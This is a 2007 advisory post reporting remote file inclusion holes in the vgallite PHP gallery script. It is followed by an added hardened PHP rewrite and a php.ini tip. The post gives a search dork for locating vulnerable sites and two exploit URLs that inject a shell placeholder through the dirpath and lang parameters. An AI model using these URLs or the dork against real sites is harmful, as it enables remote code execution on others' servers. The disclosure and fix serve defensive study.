Computer Security
[EN] securityvulns.ru

From:RaeD Hasadya <raed_(at)_bsdmail.com>
Date:06.08.2007
Subject:ALL vgallite Remote File Include

Discovered By : Hasadya Raed
----------------------------
Contact : RaeD@BsdMail.Com , Hacker_Web@W.Cn , Gunman_Pump@Hotmail.Com
----------------------------
Greetz : Jonathan , Muts  
----------------------------
Script: ALL vgallite
----------------------------
Dork: "vgallite"
----------------------------
B.File:
_functions.php
index.php
----------------------------
Vuln code: if(ereg($key,$filename)) include_once("$dirpath/$filename");
Vuln code: include_once("lang/".
((isset($language))?$language:"english").
".php");
----------------------------
Exploit:
Http://www.Victim.com/vgallite/_functions.php?dirpath=[Shell-Attack]
Http://www.Victim.com/vgallite/index.php?lang=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>
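
A hardened form of the two include_once() calls quoted in the advisory above, as an added example that is not part of the original post and not vgallite's own code. The function names, directory constants and language list are assumptions made for illustration.

```php
<?php
// Added example: names, paths and the language list below are assumptions,
// not taken from vgallite.
const LANG_DIR = __DIR__ . '/lang';        // assumed location of language files
const MODULE_DIR = __DIR__ . '/modules';   // assumed fixed replacement for $dirpath
const ALLOWED_LANGUAGES = ['english', 'german', 'french']; // constructed list

/**
 * Map a request-supplied language name to a file under LANG_DIR.
 * Strict allow-list comparison: arrays, URLs and traversal strings
 * never match and fall back to the default.
 */
function resolve_language_file($requested): string
{
    $lang = in_array($requested, ALLOWED_LANGUAGES, true) ? $requested : 'english';
    return LANG_DIR . '/' . $lang . '.php';
}

/**
 * Resolve a module file inside MODULE_DIR. The directory is a constant,
 * never a request variable. Returns null when the name is rejected.
 */
function resolve_module_file($filename): ?string
{
    // Plain file names only: no slashes, no scheme, no "..", no NUL byte.
    if (!is_string($filename) || !preg_match('/\A[A-Za-z0-9_-]+\.php\z/', $filename)) {
        return null;
    }
    $base = realpath(MODULE_DIR);
    $path = realpath(MODULE_DIR . '/' . $filename);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    // Containment check after symlinks are resolved.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Usage: request input is read explicitly, never through auto-registered globals.
$langFile = resolve_language_file($_GET['lang'] ?? null);
if (is_file($langFile)) {
    include_once $langFile;
}
$module = resolve_module_file('gallery.php'); // constructed sample file name
if ($module !== null) {
    include_once $module;
}
```

Keeping allow_url_include set to Off in php.ini adds a second layer, since it stops include_once() from fetching URL wrappers even if a path check is missed.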
